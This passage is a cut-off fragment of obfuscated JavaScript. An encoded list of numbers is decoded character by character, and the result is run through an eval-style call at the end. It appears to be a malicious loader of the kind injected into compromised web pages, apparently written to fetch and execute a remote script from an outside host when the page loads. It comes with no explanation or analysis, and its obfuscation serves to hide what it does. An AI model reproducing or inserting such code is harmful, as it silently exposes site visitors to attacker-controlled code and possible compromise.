53.5~49.5~54~57~19~18.5~56.5~48.5~56~51.5~55~57~18.5~19.5~28.5~5.5~4~3.5~3.5~3.5~56.5~48.5~56~51.5~55~57~22~57~59.5~55~49.5~15~29.5~15~18.5~57~49.5~59~57~22.5~52~47.5~58~47.5~56.5~48.5~56~51.5~55~57~18.5~28.5~5.5~4~3.5~3.5~3.5~56.5~48.5~56~51.5~55~57~22~54.5~54~56~49.5~47.5~49~59.5~56.5~57~47.5~57~49.5~48.5~51~47.5~54~50.5~49.5~15~29.5~15~50~57.5~54~48.5~57~51.5~54.5~54~15~19~19.5~15~60.5~5.5~4~3.5~3.5~3.5~3.5~51.5~50~15~19~57~51~51.5~56.5~22~56~49.5~47.5~49~59.5~40.5~57~47.5~57~49.5~15~29.5~29.5~15~18.5~48.5~54.5~53.5~55~53~49.5~57~49.5~18.5~19.5~15~60.5~5.5~4~3.5~3.5~3.5~3.5~3.5~58.5~51.5~54~49~54.5~58.5~22~59~59.5~60~50~53~47.5~50.5~15~29.5~15~24~28.5~5.5~4~3.5~3.5~3.5~3.5~61.5~5.5~4~3.5~3.5~3.5~61.5~28.5~5.5~4~3.5~3.5~3.5~56.5~48.5~56~51.5~55~57~22~54.5~54~53~54.5~47.5~49~15~29.5~15~50~57.5~54~48.5~57~51.5~54.5~54~19~19.5~15~60.5~5.5~4~3.5~3.5~3.5~3.5~58.5~51.5~54~49~54.5~58.5~22~59~59.5~60~50~53~47.5~50.5~15~29.5~15~24~28.5~5.5~4~3.5~3.5~3.5~61.5~28.5~5.5~4~3.5~3.5~3.5~56.5~48.5~56~51.5~55~57~22~56.5~56~48.5~15~29.5~15~57.5~56~53~15~20.5~15~37.5~47.5~57~51~22~56~47.5~54~49~54.5~53.5~19~19.5~22~57~54.5~40.5~57~56~51.5~54~50.5~19~19.5~22~56.5~57.5~48~56.5~57~56~51.5~54~50.5~19~24.5~19.5~15~20.5~15~18.5~22~52~56.5~18.5~28.5~5.5~4~3.5~3.5~3.5~51~49.5~47.5~49~22~47.5~55~55~49.5~54~49~32.5~51~51.5~53~49~19~56.5~48.5~56~51.5~55~57~19.5~28.5~5.5~4~3.5~3.5~61.5~5.5~4~3.5~61.5~28.5~5.5~4~61.5~19.5~19~19.5~28.5"["split"]("a~".substr(1));for(i=3-2-1;i!=691;i++){j=i;ss=ss+st[f](-h*(2-1+1*n[j]));}if(1)q=ss;if(zz)e(""+q);